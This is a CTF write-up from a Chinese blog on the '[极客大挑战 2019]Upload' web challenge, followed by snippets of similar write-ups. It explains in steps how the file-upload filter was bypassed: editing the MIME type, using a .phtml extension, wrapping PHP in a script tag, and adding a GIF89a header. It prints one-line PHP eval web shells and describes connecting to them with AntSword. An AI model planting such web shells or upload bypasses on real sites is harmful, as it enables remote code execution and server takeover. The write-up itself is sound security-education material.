[极客大挑战 2019]Upload

最新推荐文章于 2023-04-29 19:22:54 发布
最新推荐文章于 2023-04-29 19:22:54 发布
阅读量558 收藏
点赞数 1
分类专栏: 题目wp 文章标签: php 开发语言 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62092622/article/details/122942050
版权

打开之后是一个文件上传的题,先上传一个php文件试试

一句话木马文件内容为<?php eval($_POST['hhh']);?>

提示不是一个图片

初步猜测是修改Content-Type,抓包试试

使用burpsuite抓包

但是仍然显示

尝试修改php后缀

".php"等价扩展名:

".php5",".php4",".php3",".php2","php1",".html",".htm",".phtml" 

前几个均无果

 

不过尝试.phtml时,出现不同,原来文件内容不能包括'<?' 

修改文件内容为<script language="php">eval($_POST['hhh'])</script>,作用一样,可是显示Dont't lie to me,it's not image at all!!!

 后来查询,原来是需要写一个图片文件头,修改文件内容为GIF89a? <script language="php">eval($_POST['hhh'])</script>,上传成功!

 然后找文件路径,一般都在upload文件夹内,输入试试,果然在 并找到我们上传的文件

 然后用蚁剑连接一下

 连接成功

 在这里找到flag

 点击进入

-眼里有星河-
关注
专栏目录
[极客挑战 2019]Upload 1(文件上传)
weixin_45253573的博客
12-08 1万+
打开环境是一个上传图片的页面。 先上传一句话木马试试,这里格式直接不变,先上传看看。 <?php eval($_POST['b'])?> <?php $_GET['a']($_POST['b'])?> 提示说不是图片,需要抓包改文件格式。将Content-Type里面的格式改为image/jpeg 绕过后缀的有文件格式有php,php3,php4,php5,phtml.pht 前几个php格式的一句话都被b了,比如php3 将文件格式改到phtml可以了,但带<?的一句话
极客挑战 2019 Upload 1
qq_52715164的博客
04-20 2520
还是文件上传得题,上传有一句话木马写的且改后缀为jpg得文件,会出现提示说文件包含`<?传不了,所以修改木马为: GIF89a? <script language="php">eval($_REQUEST[123])</script> 打开burp,抓包修改文件后缀, 发现php上传不了, 常规文件后缀为: php2, php3, php4, php5, phps, pht, phtm, phtml 这里修改后缀为:phtml可正常上传 但上传后没有返回图片保存地址,一般上
[极客挑战 2019]Upload 1
chbeloved的博客
07-21 718
[极客挑战 2019]Upload 1 上传类题目,先上传一个一句话木马再说。 把文件后缀改成jpg php就用到了<? 那就改用script写 再用jpg上传 这都被看出来了,说明对文件内容检查,那就在文件内加个JPG89a (图片头文件欺骗) 但是不成功… 有点不死心,改成GIF89a 居然过了 说明是绕过了 接下来抓包,把jpg文件修改成phtml文件发挥作用 改第一处黄色标记那后缀phtml。然后点击go 上传成功了,访问试试。 看这结尾,一般都是upload/文件名 看来是
BUUCTF-Web-[极客挑战 2019]Upload
weixin_67813445的博客
04-29 950
,所以考虑修改为JS风格的代码标记,修改完之后发送,页面如下图所示,Don’t lie to me,it’s not image at all!用burpsuite进行抓包,修改MIME类型, 即将Content-Type修改为image/jpeg,修改之后页面如下图所示,显示NOT!将文件后缀名改为php的其他扩展名,页面如下图所示,检测文件内容中包含了’<?上传一个php文件,此处上传shell.php后页面如下图所示,显示不是图片。将文件后缀改为jpg,页面如下图所示,文件类型符合要求,但。
【BUUCTF-Web】[极客挑战 2019]Upload
weixin_49298681的博客
01-05 1091
Upload=> 文件上传漏洞。
极客挑战2019-upload
m0_73303597的博客
12-11 363
自用
[极客挑战 2019]Upload wp
{OvEr}的博客
11-19 154
[极客挑战 2019]PHP wp
buu web:[极客挑战 2019]Upload
m0_55378150的博客
04-10 2140
打开靶机,发现是一个文件上传的窗口 先上传个一句话 hack.php 提示不是image格式,所以得用burp抓包修改一下,进行MIME绕过(MIME由一串简单的字符串组成,初期标识了邮件e-mail的附件的类型,后来在html文件中可以用Content-Type属性表示,描述了这个文件的类型) 将Content-Type这里改成image格式,可以是image/jpeg,其他的大家可以百度 发送 提示不能是php,说明php已经被过滤了 ,百度了一下绕过方法,发现了一个叫phtml.
极客挑战 2019]EasySQL
最新发布
09-03
EasySQL 是极客挑战 2019 中的一个题目,它是一个简单的 SQL 数据库查询题目。可以通过编写 SQL 查询语句来实现对给定的数据库表进行数据查询和分析。 在 EasySQL 中,你将面对一个包含不同表的数据库,你需要根据题目要求来编写 SQL 查询语句,从而得到正确的结果。这道题的目标是考察你对 SQL 查询语句的掌握程度和对数据库操作的理解。 在极客挑战 2019 中,EasySQL 是一个相对较简单的题目,旨在帮助参赛者熟悉 SQL 查询语句的基本使用和常见操作。通过解决这个问题,你将能够提高自己的 SQL 查询能力,并为更复杂的数据库操作打下基础。 如果你有关于 EasySQL 的具体问题,我可以帮助你更详细地解答。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值